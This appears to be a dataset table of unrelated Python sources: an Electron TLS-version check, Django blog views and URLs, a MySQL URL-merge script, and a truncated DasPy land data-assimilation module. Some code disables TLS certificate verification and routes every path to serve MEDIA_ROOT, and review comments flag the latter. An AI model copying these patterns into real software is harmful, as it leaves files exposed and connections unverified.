text stringlengths 8 6.05M |
|---|
#!/usr/bin/env python
from __future__ import print_function
import json
import os
import ssl
import subprocess
import sys
import urllib2
# TLS context with certificate verification disabled: the probe below talks
# to a local `node lib/tls` helper server that uses a self-signed
# certificate, so hostname and chain checks must be turned off.
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
def check_tls(verbose):
    """Verify that this Python's TLS support is new enough to build Electron.

    Spawns ``node lib/tls`` (which prints the port it listens on as its
    first line of output), fetches ``https://localhost:<port>`` and reads
    the negotiated protocol from the JSON response.  If the protocol is
    TLSv1 or TLSv1.1 the interpreter is too old: a pointer to the
    platform-specific build instructions is printed and the process exits
    with status 1.  Otherwise, when *verbose* is true, a confirmation
    message is printed.
    """
    process = subprocess.Popen(
        'node lib/tls',
        cwd=os.path.dirname(os.path.realpath(__file__)),
        shell=True,
        stdout=subprocess.PIPE,
        stderr=subprocess.STDOUT
    )
    # First stdout line is the port number; strip the trailing newline so
    # the URL built below is well-formed.
    port = process.stdout.readline().strip()
    localhost_url = 'https://localhost:' + port
    response = json.load(urllib2.urlopen(localhost_url, context=ctx))
    tls = response['protocol']
    process.wait()

    if sys.platform == "linux" or sys.platform == "linux2":
        tutorial = "./docs/development/build-instructions-linux.md"
    elif sys.platform == "darwin":
        tutorial = "./docs/development/build-instructions-macos.md"
    elif sys.platform == "win32":
        tutorial = "./docs/development/build-instructions-windows.md"
    else:
        # Added the missing space between the concatenated fragments
        # ("system" + "in" previously ran together).
        tutorial = "build instructions for your operating system" \
            + " in ./docs/development/"

    if tls == "TLSv1" or tls == "TLSv1.1":
        # Fixed missing spaces between concatenated message fragments
        # ("securityprotocol", "<tutorial>.for instructions").
        print("Your system/python combination is using an outdated security "
              + "protocol and will not be able to compile Electron. Please see "
              + tutorial
              + " for instructions on how to update Python.")
        sys.exit(1)
    else:
        if verbose:
            print("Your Python is using " + tls + ", which is sufficient for "
                  + "building Electron.")
# Script entry point: run the check verbosely.  The failure path inside
# check_tls exits with status 1 itself; reaching this exit means success.
if __name__ == '__main__':
    check_tls(True)
    sys.exit(0)
|
import datetime
from django.contrib.contenttypes.models import ContentType
from django.core.paginator import Paginator
from django.db.models import Count
from django.http import HttpResponseRedirect, Http404, HttpResponse
from django.shortcuts import render, get_object_or_404
from django.urls import reverse
from blog.forms import BlogForm, EntryForm, TopicForm
from blog.models import Blog, Entry, Topic, Tag
from blog_django.settings import PAGE_NUM
from comment.forms import CommentForm
from comment.models import Comment
from read_statistics.utils import read_statistics
def common(request, blog_list=None):
    """Build the context shared by the blog list views.

    Paginates *blog_list* (defaults to all blogs), and adds the per-tag
    blog counts and the per-month archive counts for the sidebar.

    Fixes: the original default ``blog_list=Blog.objects.all()`` was
    created once at import time, so its result cache could go stale after
    first evaluation; a leftover debug ``print`` was removed.
    """
    if blog_list is None:
        blog_list = Blog.objects.all()

    paginator = Paginator(blog_list, PAGE_NUM)  # PAGE_NUM blogs per page
    page = request.GET.get('page')
    blogs = paginator.get_page(page)

    # Count blogs per (year, month) for the archive sidebar, newest first.
    blog_date_dict = {}
    for blog_date in Blog.objects.dates('pub_date', 'month', order='DESC'):
        blog_date_dict[blog_date] = Blog.objects.filter(
            pub_date__year=blog_date.year,
            pub_date__month=blog_date.month,
        ).count()

    return {
        'blogs': blogs,
        'count': paginator.count,
        'blog_tag_list': Tag.objects.annotate(blog_count=Count('blog')),
        'blog_date_dict': blog_date_dict,
    }
def pages(request, list=None):
    """Paginate *list* (defaults to all blogs) and return the current page.

    NOTE(review): the parameter keeps the builtin-shadowing name ``list``
    because existing callers pass it by keyword (``pages(request,
    list=...)``); renaming would break them.

    Fixes: the original default ``Blog.objects.all()`` was evaluated once
    at function-definition time, so its queryset result cache could go
    stale; defaulting to None avoids that.
    """
    if list is None:
        list = Blog.objects.all()
    paginator = Paginator(list, PAGE_NUM)  # PAGE_NUM items per page
    page = request.GET.get('page')
    return paginator.get_page(page)
def blogs(request):
    """Render the paginated list of all blog posts."""
    return render(request, 'blog/blogs.html', common(request))
def blog(request, blog_id):
    """Render one blog post with its comments and update its read counter.

    Fixes: uses ``get_object_or_404`` (consistent with ``blog_with_tag``)
    so an unknown id yields a 404 instead of an unhandled DoesNotExist
    (HTTP 500).
    """
    blog = get_object_or_404(Blog, id=blog_id)
    # Read-count statistics; returns the cookie key marking this post as
    # already read by the current browser.
    read_cookie_key = read_statistics(request, blog)
    # Previous / next post by publication date.  NOTE(review): strict
    # gt/lt means two posts published at the exact same instant would skip
    # each other — confirm whether that matters (original comment raised
    # the same concern).
    previous_page = Blog.objects.filter(pub_date__gt=blog.pub_date).last()
    next_page = Blog.objects.filter(pub_date__lt=blog.pub_date).first()
    # Comments are attached generically via ContentType.
    blog_content_type = ContentType.objects.get_for_model(blog)
    comments = Comment.objects.filter(content_type=blog_content_type, object_id=blog.id)
    context = {
        'blog': blog,
        'previous_page': previous_page,
        'next_page': next_page,
        'comments': comments,
        'comment_form': CommentForm(initial={'content_type': blog_content_type.model, 'object_id': blog_id}),
    }
    response = render(request, 'blog/blog.html', context)
    # Set the "already read" cookie on the way out.
    response.set_cookie(read_cookie_key, 'true')
    return response
def new_blog(request):
    """Create a new blog post.

    GET shows an empty form; POST validates the submission, saves it with
    the current user as author, and redirects to the blog list.  An
    invalid POST re-renders the bound form with its errors.
    """
    if request.method == 'POST':
        # Bind and validate the submitted data.
        form = BlogForm(request.POST)
        if form.is_valid():
            new_blog = form.save(commit=False)
            new_blog.author = request.user
            new_blog.save()
            return HttpResponseRedirect(reverse('blog:blogs'))
    else:
        # Unbound form for the initial GET.
        form = BlogForm()
    return render(request, 'blog/new_blog.html', {'form': form})
def blog_with_data(request, year, month):
    """Render the archive page of blogs published in *year*/*month*."""
    monthly_blogs = Blog.objects.filter(pub_date__year=year, pub_date__month=month)
    context = {}
    context.update(common(request, blog_list=monthly_blogs))
    return render(request, 'blog/blog_with_data.html', context)
def blog_with_tag(request, tag_id):
    """Render blogs carrying the given tag; 404 for an unknown tag id."""
    tag = get_object_or_404(Tag, pk=tag_id)
    context = {'tag': tag}
    context.update(common(request, blog_list=Blog.objects.filter(tag=tag)))
    return render(request, 'blog/blog_with_tag.html', context)
def topics(request):
    """Render the paginated list of all topics."""
    all_topics = Topic.objects.all()
    # `pages` paginates the full queryset for the requested page number.
    context = {'topics': pages(request, list=all_topics)}
    return render(request, 'blog/topics.html', context)
def topic(request, topic_id):
    """Render one topic with its entries, newest first."""
    current_topic = Topic.objects.get(id=topic_id)
    # NOTE(review): the original comment worried this errors when empty —
    # an empty queryset is fine here; verify the template handles it.
    entry_list = current_topic.entry_set.all().order_by('-pub_date')
    context = {
        'topic': current_topic,
        'entries': pages(request, list=entry_list),  # paginate all entries
    }
    return render(request, 'blog/topic.html', context)
def new_topic(request):
    """Create a new topic.

    GET shows an empty form; POST validates, saves the topic with the
    current user as author, and redirects to the topic list.  An invalid
    POST re-renders the bound form with its errors.
    """
    if request.method == 'POST':
        # Bind and validate the submitted data.
        form = TopicForm(data=request.POST)
        if form.is_valid():
            new_topic = form.save(commit=False)
            new_topic.author = request.user
            new_topic.save()
            return HttpResponseRedirect(reverse('blog:topics'))
    else:
        # Unbound form for the initial GET.
        form = TopicForm()
    return render(request, 'blog/new_topic.html', {'form': form})
def new_entry(request, topic_id):
    """Add an entry to a topic; only the topic's author may do so (404
    otherwise)."""
    topic = Topic.objects.get(id=topic_id)
    if topic.author != request.user:
        raise Http404
    if request.method == 'POST':
        # Bind and validate the submitted data.
        form = EntryForm(data=request.POST)
        if form.is_valid():
            new_entry = form.save(commit=False)
            new_entry.topic = topic
            new_entry.save()
            return HttpResponseRedirect(reverse('blog:topic', args=[topic_id]))
    else:
        # Unbound form for the initial GET.
        form = EntryForm()
    return render(request, 'blog/new_entry.html', {'topic': topic, 'form': form})
def edit_entry(request, entry_id):
    """Edit an existing entry; only the owning topic's author may do so
    (404 otherwise)."""
    entry = Entry.objects.get(id=entry_id)
    topic = entry.topic
    if topic.author != request.user:
        raise Http404
    if request.method == 'POST':
        # Bind the submission against the existing instance and validate.
        form = EntryForm(instance=entry, data=request.POST)
        if form.is_valid():
            form.save()
            return HttpResponseRedirect(reverse('blog:topic', args=[topic.id]))
    else:
        # Pre-fill the form with the entry's current content.
        form = EntryForm(instance=entry)
    return render(request, 'blog/edit_entry.html', {'entry': entry, 'topic': topic, 'form': form})
# NOTE(review): the view name shadows the builtin `all`; kept unchanged
# because the URLconf may reference `views.all`.
def all(request):
    # Static page; no extra context is needed.
    return render(request, 'blog/all.html')
def edit_blog(request, blog_id):
    """Edit an existing blog post.

    Fixes: the original performed no ownership check, so any logged-in
    user could edit any post; mirroring ``edit_entry``, non-authors now
    get a 404.
    """
    blog = Blog.objects.get(id=blog_id)
    if blog.author != request.user:
        raise Http404
    if request.method == 'POST':
        # Bind the submission against the existing instance and validate.
        form = BlogForm(instance=blog, data=request.POST)
        if form.is_valid():
            form.save()
            return HttpResponseRedirect(reverse('blog:blog', args=[blog_id]))
    else:
        # Pre-fill the form with the post's current content.
        form = BlogForm(instance=blog)
    context = {
        'blog': blog,
        'form': form,
    }
    return render(request, 'blog/edit_blog.html', context)
def delete_blog(request, blog_id):
    """Delete a blog post and redirect to the blog list.

    Fixes: replaced the odd unbound call ``Blog.delete(blog)`` with the
    idiomatic ``blog.delete()`` and, for consistency with
    ``edit_entry``/``new_entry``, restricted deletion to the post's
    author (404 otherwise).
    NOTE(review): deletion is triggered by GET, which is CSRF-prone —
    consider requiring POST.
    """
    blog = Blog.objects.get(id=blog_id)
    if blog.author != request.user:
        raise Http404
    blog.delete()
    return HttpResponseRedirect(reverse('blog:blogs'))
|
from django.conf.urls import url
from django.conf import settings
from django.conf.urls.static import static, serve
from django.contrib.staticfiles.urls import staticfiles_urlpatterns
from . import views
urlpatterns = [
    url(r'^$', views.AgendaView.as_view(), name='event_list'),
    # NOTE(review): this catch-all matches EVERY remaining path and serves
    # it straight from MEDIA_ROOT.  That shadows the static() and
    # staticfiles patterns appended below (they can never match) and
    # exposes all media files regardless of DEBUG — confirm this is
    # intended before deploying to production.
    url(r'^(?P<path>.*)$', serve, {'document_root': settings.MEDIA_ROOT}),
] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT) + staticfiles_urlpatterns()
|
import os
import json
import time
# connect mysql db
from cr_1111.myConnect import myConnect
"""
IEK URL 合併回 mysql ieknews
"""
# Merge crawled IEK article URLs (one JSON file per article) back into the
# MySQL `ieknews` table, matching rows by original title.
if __name__ == "__main__":
    cnt = 0  # number of ieknews rows actually updated
    # MySQL connection via the project-local helper.
    mydb = myConnect()
    urldir = r'E:\專題\crawler_data\iek_url'
    # os.walk keeps descending until it reaches plain files.
    for dir_path, dir_names, file_names in os.walk(urldir):
        for single_file in file_names:
            # Skip hidden files such as .DS_Store.
            if not single_file.startswith("."):
                # print(single_file)
                with open(os.path.join(dir_path, single_file)) as f:
                    data = json.load(f)
                # NOTE(review): assumes every JSON file has non-null
                # "newstitle" and "url" keys — .get() returning None would
                # crash on .strip(); confirm against the crawler output.
                newstitle = data.get("newstitle").strip()
                newsurl = data.get("url").strip()
                # Look up the row's primary key by its original title.
                iekseq = mydb.queryone("select seq from ieknews where otitle=%s", newstitle)
                if iekseq:
                    sql = "update ieknews set url=%s where seq=%s"
                    # execmmit: presumably "execute + commit" in the
                    # myConnect helper — verify.
                    mydb.execmmit(sql, (newsurl, iekseq[0]))
                    cnt += 1
                    print(iekseq, newstitle, newsurl)
                    #print(type(newsurl), type(iekseq))
    # Close the MySQL connection.
    mydb.close()
    print('-------------- Done -------------------')
    print(cnt)
# -*- coding: utf-8 -*-
'''
Copyright of DasPy:
Author - Xujun Han (Forschungszentrum Jülich, Germany)
x.han@fz-juelich.de, xujunhan@gmail.com
DasPy was funded by:
1. Forschungszentrum Jülich, Agrosphere (IBG 3), Jülich, Germany
2. Cold and Arid Regions Environmental and Engineering Research Institute, Chinese Academy of Sciences, Lanzhou, PR China
3. Centre for High-Performance Scientific Computing in Terrestrial Systems: HPSC TerrSys, Geoverbund ABC/J, Jülich, Germany
Please include the following references related to DasPy:
1. Han, X., Li, X., He, G., Kumbhar, P., Montzka, C., Kollet, S., Miyoshi, T., Rosolem, R., Zhang, Y., Vereecken, H., and Franssen, H. J. H.:
DasPy 1.0 : the Open Source Multivariate Land Data Assimilation Framework in combination with the Community Land Model 4.5, Geosci. Model Dev. Discuss., 8, 7395-7444, 2015.
2. Han, X., Franssen, H. J. H., Rosolem, R., Jin, R., Li, X., and Vereecken, H.:
Correction of systematic model forcing bias of CLM using assimilation of cosmic-ray Neutrons and land surface temperature: a study in the Heihe Catchment, China, Hydrology and Earth System Sciences, 19, 615-629, 2015a.
3. Han, X., Franssen, H. J. H., Montzka, C., and Vereecken, H.:
Soil moisture and soil properties estimation in the Community Land Model with synthetic brightness temperature observations, Water Resour Res, 50, 6081-6105, 2014a.
4. Han, X., Franssen, H. J. H., Li, X., Zhang, Y. L., Montzka, C., and Vereecken, H.:
Joint Assimilation of Surface Temperature and L-Band Microwave Brightness Temperature in Land Data Assimilation, Vadose Zone J, 12, 0, 2013.
'''
import os, sys, time, datetime, random, math, gc, subprocess, glob, signal, string, shutil, warnings, multiprocessing, socket, getpass, ctypes, platform, functools, copy
import numpy, scipy, scipy.stats, scipy.signal, netCDF4, scipy.ndimage
import pp,imp
#os.system("taskset -pc 0-47 %d" % os.getpid())
# Make the DasPy sub-packages importable relative to the working
# directory (model drivers, utilities, and assimilation algorithms).
sys.path.append('SysModel/CLM')
sys.path.append('Utilities')
sys.path.append('Utilities/Soil')
sys.path.append('Algorithm')
sys.path.append('Algorithm/GSIF')
sys.path.append('Algorithm/ReBEL')
sys.path.append('Algorithm/Noise')
sys.path.append('Algorithm/MultiScale')
sys.path.append('Algorithm/Geostatistics/CorrelationModel')
sys.path.append('Algorithm/Geostatistics/Scripts')
sys.path.append('ForcingData')
from Call_CLM_CESM import *
from ParFor import *
from Read_Soil_Texture import *
from DAS_Assim_Common import *
from DAS_Driver_Common import *
def CLM_Assim_Common(Block_Index, Model_Driver, Def_PP, Def_First_Run, Def_Print, Def_Multiresolution, Def_ReBEL, Def_Localization, Num_Local_Obs, eps, msw_infl, parm_infl, Post_Inflation_Alpha, Def_ParFor, Row_Numbers, Col_Numbers, Ensemble_Number, Ensemble_Number_Predict, Call_Gstat_Flag, Assim_Algorithm_Name, Model_State, E0_SysModel, E0_ObsModel, \
Stop_Month, Stop_Day, Stop_Hour, UTC_Zone, MODEL_X_Left, MODEL_X_Right, MODEL_Y_Lower, MODEL_Y_Upper, Proj_String, Z_Resolution, Sub_Block_Ratio_Row, Sub_Block_Ratio_Col, Observation_X_Left, Observation_X_Right, Observation_Y_Lower, Observation_Y_Upper, Variable_List,
Grid_Resolution_CEA, Prop_Grid_Array_Sys, Prop_Grid_Array_H_Trans, Model_Variance, Write_DA_File_Flag, Mask, Mask_Index, Land_Mask_Data, Observation_Variance, SensorQuantity, SensorQuantity_Index,
Observation_NLats, Observation_NLons, Observation_Longitude, Observation_Latitude, Observation_Matrix, DAS_Depends_Path, DasPy_Path, CLM_NA, NAvalue, Soil_Layer_Index_DA, Soil_Layer_Num, ParFlow_Layer_Num, omp_get_num_procs_ParFor, Normal_Score_Trans, PDAF_Assim_Framework, PDAF_Filter_Type, NSLOTS, DAS_Output_Path, Region_Name,
Variable_Assimilation_Flag, Teta_Residual, Teta_Saturated, Teta_Field_Capacity, Teta_Wilting_Point, SensorType, SensorVariable, SensorResolution, Datetime_Start, Datetime_Stop, Datetime_Stop_Init, Datetime_Initial,
Observation_Corelation_Par, Bias_Estimation_Option_Model, Bias_Estimation_Option_Obs, Low_Ratio_Par, High_Ratio_Par,
Model_State_Inflation_Range, Model_State_Inflation_Range_STD, Model_Bias_Range, Observation_Bias_Range, Model_Bias_Range_STD, Observation_Bias_Range_STD, Model_Bias_STD, Observation_Bias_STD,
CLM_Ground_Temperature_Ensemble_Mat,CLM_Vegetation_Temperature_Ensemble_Mat,CLM_Soil_Moisture_Ensemble_Mat,CLM_Soil_Temperature_Ensemble_Mat, PF_PRESSURE_Ensemble_Mat, PF_SATURATION_Ensemble_Mat,
Prop_Grid_Array_Sys_parm_infl, CLM_Latent_Heat_parm_infl, CLM_Surface_Temperature_parm_infl, CLM_Ground_Temperature_parm_infl,CLM_Vegetation_Temperature_parm_infl, CLM_Soil_Moisture_parm_infl,CLM_Soil_Temperature_parm_infl, PF_SATURATION_parm_infl,
CLM_Ground_Temperature_Ensemble_Mat_Bias,CLM_Vegetation_Temperature_Ensemble_Mat_Bias,CLM_Soil_Moisture_Ensemble_Mat_Bias,CLM_Soil_Temperature_Ensemble_Mat_Bias,
CLM_Surface_Temperature_parm_infl_Bias, CLM_Ground_Temperature_parm_infl_Bias,CLM_Vegetation_Temperature_parm_infl_Bias, CLM_Soil_Moisture_parm_infl_Bias,CLM_Soil_Temperature_parm_infl_Bias,
Prop_Grid_Array_Bias, Observation_Bias, Prop_Grid_Array_Sys_parm_infl_Bias, Observation_parm_infl_Bias, Def_CDF_Matching, Plot_Analysis, Parameter_Optimization_Flag,
Start_Month, maxpft, Feedback_Assim, Dim_Soil_Par, Soil_Par_Sens, Dim_Veg_Par, Veg_Par_Sens, Dim_PFT_Par, PFT_Par_Sens, Dim_Hard_Par, Hard_Par_Sens, Soil_Par_Sens_Dim, Veg_Par_Sens_Dim, PFT_Par_Sens_Dim, Hard_Par_Sens_Dim, \
Parameter_Soil_Space_Ensemble, Parameter_Soil_Space_parm_infl, Parameter_Veg_Space_Ensemble, Parameter_Veg_Space_parm_infl, Parameter_PFT_Space_Ensemble, Parameter_PFT_Space_parm_infl, Parameter_Hard_Space_Ensemble, Parameter_Hard_Space_parm_infl, Parameter_Min_Max, \
Soil_Layer_Thickness_Ratio, Soil_Texture_Layer_Opt_Num, Soil_Sand_Clay_Sum, Parameter_Range_Soil, Parameter_Range_Veg, Parameter_Range_PFT, Parameter_Range_Hard, Parameter_Regularization, Par_Soil_Uniform_STD, Par_Veg_Uniform_STD, Par_PFT_Uniform_STD, Par_Hard_Uniform_STD,
Saturation_SSat, Saturation_SRes, Saturation_N, Saturation_Alpha, DateString_Plot, *vartuple):
pyper = imp.load_source("pyper",DasPy_Path+"Utilities/pyper.py")
Call_ReBEL_Octave = imp.load_source("Call_ReBEL_Octave",DasPy_Path+"Algorithm/ReBEL/Call_ReBEL_Octave.py")
gssm_das_octave = []
letkf = imp.load_source("letk",DasPy_Path+"Algorithm/DAS/letkf.py")
letkf_common = imp.load_dynamic("letkf_common",DasPy_Path+"Algorithm/DAS/letkf_common.so")
octave = vartuple[0]
Analysis_Grid = numpy.zeros((Row_Numbers, Col_Numbers),dtype=numpy.float32)
Localization_Map_Mask = numpy.zeros((Row_Numbers, Col_Numbers),dtype=numpy.float32)
Analysis_Grid_Array = numpy.zeros((Ensemble_Number, Row_Numbers, Col_Numbers),dtype=numpy.float32)
Innovation_State = numpy.zeros_like(Analysis_Grid_Array,dtype=numpy.float32)
Increments_State = numpy.zeros_like(Analysis_Grid_Array,dtype=numpy.float32)
#--------------Find Available Observations
Observation_Matrix_Temp = numpy.copy(Observation_Matrix)
Obs_Index = numpy.where(Observation_Matrix_Temp.flatten() != NAvalue)
Obs_Index_Dim = numpy.size(Obs_Index)
if Def_Print:
print "Obs_Index_Dim", Obs_Index_Dim
del Observation_Matrix_Temp
#--------------- Save the Observation Grid for DA -----------------
Obs_Grid = numpy.zeros((Obs_Index_Dim, 3),dtype=numpy.float32)
Obs_Grid[:, 0] = Observation_Longitude.flatten()[Obs_Index]
Obs_Grid[:, 1] = Observation_Latitude.flatten()[Obs_Index]
Obs_Grid[:, 2] = Observation_Matrix.flatten()[Obs_Index]
if Write_DA_File_Flag:
numpy.savetxt(DasPy_Path+'Analysis/DAS_Temp/X_Diff.txt', Mask[:, 0] - Observation_Longitude.flatten())
numpy.savetxt(DasPy_Path+'Analysis/DAS_Temp/Y_Diff.txt', Mask[:, 1] - Observation_Latitude.flatten())
numpy.savetxt(DasPy_Path+'Analysis/DAS_Temp/Obs_Grid.txt', Obs_Grid)
#------------------------- Prepare DA --------------------
State_DIM_Single_Layer = numpy.size(numpy.where(Mask_Index == False))
# Expand the dimension to include the deep layers
Mask_Copy = numpy.copy(Mask)
Mask_Index_Single_Layer = numpy.copy(Mask_Index)
Def_ReBEL_Temp = Def_ReBEL
Def_Localization_Temp = Def_Localization
if Def_ReBEL_Temp == 1:
if (not Parameter_Optimization_Flag) and (not ((numpy.size(numpy.where(Bias_Estimation_Option_Model == 1)) >= 1) or (numpy.size(numpy.where(Bias_Estimation_Option_Obs == 1)) >= 1))):
# For State Estimation
if Variable_Assimilation_Flag[Variable_List.index(SensorVariable)] and SensorVariable == "Soil_Moisture":
if SensorType == "InSitu":
for i in range(Soil_Layer_Num - 5 -1):
Mask_Index = numpy.append(Mask_Index,Mask_Index_Single_Layer)
Mask = numpy.vstack((Mask,Mask_Copy))
if Feedback_Assim: # and (string.atoi(Stop_Month) >= 4) and (string.atoi(Stop_Month) <= 10):
for i in range(Soil_Layer_Num + 2):
Mask_Index = numpy.append(Mask_Index,Mask_Index_Single_Layer)
Mask = numpy.vstack((Mask,Mask_Copy))
else:
for i in range(Soil_Layer_Num - 5):
Mask_Index = numpy.append(Mask_Index,Mask_Index_Single_Layer)
Mask = numpy.vstack((Mask,Mask_Copy))
if Feedback_Assim: # and (string.atoi(Stop_Month) >= 4) and (string.atoi(Stop_Month) <= 10):
for i in range(Soil_Layer_Num + 2):
Mask_Index = numpy.append(Mask_Index,Mask_Index_Single_Layer)
Mask = numpy.vstack((Mask,Mask_Copy))
elif (Variable_Assimilation_Flag[Variable_List.index(SensorVariable)] and SensorVariable == "Surface_Temperature"):
for i in range(Soil_Layer_Num + 2):
Mask_Index = numpy.append(Mask_Index,Mask_Index_Single_Layer)
Mask = numpy.vstack((Mask,Mask_Copy))
if Feedback_Assim: # and (string.atoi(Stop_Month) >= 4) and (string.atoi(Stop_Month) <= 10):
for i in range(Soil_Layer_Num - 5):
Mask_Index = numpy.append(Mask_Index,Mask_Index_Single_Layer)
Mask = numpy.vstack((Mask,Mask_Copy))
else:
# For Parameter Estimation
if Soil_Par_Sens_Dim >= 1:
for Par_Index in range(Dim_Soil_Par):
if Soil_Par_Sens[Par_Index]:
Mask_Index = numpy.append(Mask_Index,Mask_Index_Single_Layer)
Mask = numpy.vstack((Mask,Mask_Copy))
if PFT_Par_Sens_Dim >= 1:
for Par_Index in range(Dim_PFT_Par):
if PFT_Par_Sens[Par_Index]:
Mask_Index = numpy.append(Mask_Index,Mask_Index_Single_Layer)
Mask = numpy.vstack((Mask,Mask_Copy))
if Def_Print:
print "numpy.shape(Mask_Index),numpy.shape(Mask)",numpy.shape(Mask_Index),numpy.shape(Mask)
nx = numpy.size(numpy.where(Mask_Index == False)) # Number of Model Grids
ny = Obs_Index_Dim # Number of the Observations
if Def_Print:
if (not Parameter_Optimization_Flag) and (not ((numpy.size(numpy.where(Bias_Estimation_Option_Model == 1)) >= 1) or (numpy.size(numpy.where(Bias_Estimation_Option_Obs == 1)) >= 1))):
# For State Estimatio
if Variable_Assimilation_Flag[Variable_List.index(SensorVariable)] and SensorVariable == "Soil_Moisture":
if SensorType == "InSitu":
if Feedback_Assim: # and (string.atoi(Stop_Month) >= 4) and (string.atoi(Stop_Month) <= 10):
print "The Number of Model Grid is:", nx / (Soil_Layer_Num-5+17)
else:
print "The Number of Model Grid is:", nx / (Soil_Layer_Num-5)
else:
if Feedback_Assim: # and (string.atoi(Stop_Month) >= 4) and (string.atoi(Stop_Month) <= 10):
print "The Number of Model Grid is:", nx / (Soil_Layer_Num-5+1+17)
else:
print "The Number of Model Grid is:", nx / (Soil_Layer_Num-5+1)
elif (Variable_Assimilation_Flag[Variable_List.index(SensorVariable)] and SensorVariable == "Surface_Temperature"):
if Feedback_Assim: # and (string.atoi(Stop_Month) >= 4) and (string.atoi(Stop_Month) <= 10):
print "The Number of Model Grid is:", nx / (Soil_Layer_Num+3+10)
else:
print "The Number of Model Grid is:", nx / (Soil_Layer_Num+3)
else:
print "The Number of Model Grid is:", nx / (1)
else:
# For Parameter Estimation
if Soil_Par_Sens_Dim >= 1:
print "The Number of Model Grid is:", nx / (Soil_Par_Sens_Dim+1)
if PFT_Par_Sens_Dim >= 1:
print "The Number of Model Grid is:", nx / (PFT_Par_Sens_Dim+1)
print "The Number of Observation Grid is:", ny
if (not Parameter_Optimization_Flag) and (not ((numpy.size(numpy.where(Bias_Estimation_Option_Model == 1)) >= 1) or (numpy.size(numpy.where(Bias_Estimation_Option_Obs == 1)) >= 1))):
# For State Estimation
if Variable_Assimilation_Flag[Variable_List.index(SensorVariable)] and SensorVariable == "Soil_Moisture":
if Feedback_Assim: # and (string.atoi(Stop_Month) >= 4) and (string.atoi(Stop_Month) <= 10):
if SensorType == "InSitu":
if (nx / (Soil_Layer_Num-5+17)) < ny:
print "******************nx / (Soil_Layer_Num-5+17) < ny************************",nx / (Soil_Layer_Num-5+17),ny
os.abort()
else:
if (nx / (Soil_Layer_Num-5+1+17)) < ny:
print "******************nx / (Soil_Layer_Num-5+1+17) < ny************************",nx / (Soil_Layer_Num-5+1+17),ny
os.abort()
else:
if SensorType == "InSitu":
if (nx / (Soil_Layer_Num-5)) < ny:
print "******************nx / (Soil_Layer_Num-5) < ny************************",nx / (Soil_Layer_Num-5),ny
os.abort()
else:
if (nx / (Soil_Layer_Num-5+1)) < ny:
print "******************nx / (Soil_Layer_Num-5+1) < ny************************",nx / (Soil_Layer_Num-5+1),ny
os.abort()
elif (Variable_Assimilation_Flag[Variable_List.index(SensorVariable)] and SensorVariable == "Surface_Temperature"):
if Feedback_Assim: # and (string.atoi(Stop_Month) >= 4) and (string.atoi(Stop_Month) <= 10):
if (nx / (Soil_Layer_Num+3+10)) < ny:
print "******************nx / (Soil_Layer_Num+3+10) < ny************************",nx / (Soil_Layer_Num+3+10),ny
os.abort()
else:
if (nx / (Soil_Layer_Num+3)) < ny:
print "******************nx / (Soil_Layer_Num+3) < ny************************",nx / (Soil_Layer_Num+3),ny
os.abort()
else:
if (nx / (1)) < ny:
print "******************nx / (1) < ny************************",nx / (1),ny
os.abort()
else:
# For Parameter Estimation
if Soil_Par_Sens_Dim >= 1:
if (nx / (Soil_Par_Sens_Dim + 1)) < ny:
print "******************nx / (numpy.size(numpy.where(Soil_Par_Sens == True)) + 1)************************",nx / (Soil_Par_Sens_Dim + 1),ny
os.abort()
if PFT_Par_Sens_Dim >= 1:
if (nx / (PFT_Par_Sens_Dim + 1)) < ny:
print "******************nx / (numpy.size(numpy.where(PFT_Par_Sens == True)) + 1)************************",nx / (PFT_Par_Sens_Dim + 1),ny
os.abort()
#H Operator where the Value of H is 1.0 at the Location of the Observed Grid
Mask_False = numpy.where(Mask_Index == False)
Mask_False_Single_Layer = numpy.where(Mask_Index_Single_Layer == False)
if Def_Print:
print "Mask_False",Mask_False[0]
print "Mask_False_Single_Layer",Mask_False_Single_Layer
h = numpy.zeros((ny, nx),dtype=numpy.integer)
#h[~Mask_Index,~Mask_Index] = 1.0
if Def_Print >= 3:
print "Obs_Index",Obs_Index[0]
if Def_ParFor:
#print "State_DIM_Single_Layer",State_DIM_Single_Layer,numpy.shape(h[:,0:State_DIM_Single_Layer])
#----------------------------------******* Using ParFor to Accelerate H_Operator"
ParFor_H_Operator(h[:,0:State_DIM_Single_Layer],ny,Mask_False_Single_Layer[0],Obs_Index[0],Variable_Assimilation_Flag[Variable_List.index("Soil_Moisture")],\
SensorVariable,SensorType,Soil_Layer_Index_DA,State_DIM_Single_Layer,\
Parameter_Optimization_Flag,Bias_Estimation_Option_Model[Variable_List.index(SensorVariable)], Bias_Estimation_Option_Obs[Variable_List.index(SensorVariable)],DAS_Depends_Path,omp_get_num_procs_ParFor)
else:
for ny_index in range(ny):
if numpy.size(numpy.where(Mask_False_Single_Layer[0] == Obs_Index[0][ny_index])) > 0:
#print numpy.where(Mask_False_Single_Layer[0] == Obs_Index[0][ny_index])
if (not Parameter_Optimization_Flag) and (not ((numpy.size(numpy.where(Bias_Estimation_Option_Model == 1)) >= 1) or (numpy.size(numpy.where(Bias_Estimation_Option_Obs == 1)) >= 1))):
# For State Estimation
if Variable_Assimilation_Flag[Variable_List.index(SensorVariable)] and SensorVariable == "Soil_Moisture":
if SensorType == "InSitu":
#print Mask_False_Single_Layer[0],Obs_Index[0][ny_index],numpy.where(Mask_False_Single_Layer[0] == Obs_Index[0][ny_index])
H_Col_Index = numpy.where(Mask_False_Single_Layer[0] == Obs_Index[0][ny_index])[0][0] + Soil_Layer_Index_DA*State_DIM_Single_Layer
else:
#print Mask_False_Single_Layer[0],Obs_Index[0][ny_index],numpy.where(Mask_False_Single_Layer[0] == Obs_Index[0][ny_index])
H_Col_Index = numpy.where(Mask_False_Single_Layer[0] == Obs_Index[0][ny_index])[0][0]
else:
H_Col_Index = numpy.where(Mask_False_Single_Layer[0] == Obs_Index[0][ny_index])[0][0]
elif (not Parameter_Optimization_Flag) and ((numpy.size(numpy.where(Bias_Estimation_Option_Model == 1)) >= 1) or (numpy.size(numpy.where(Bias_Estimation_Option_Obs == 1)) >= 1)):
# For Bias Estimation
if Variable_Assimilation_Flag[Variable_List.index(SensorVariable)] and SensorVariable == "Soil_Moisture":
H_Col_Index = numpy.where(Mask_False_Single_Layer[0] == Obs_Index[0][ny_index])[0][0]
else:
H_Col_Index = numpy.where(Mask_False_Single_Layer[0] == Obs_Index[0][ny_index])[0][0]
else:
# For Bias Estimation
H_Col_Index = numpy.where(Mask_False_Single_Layer[0] == Obs_Index[0][ny_index])[0][0]
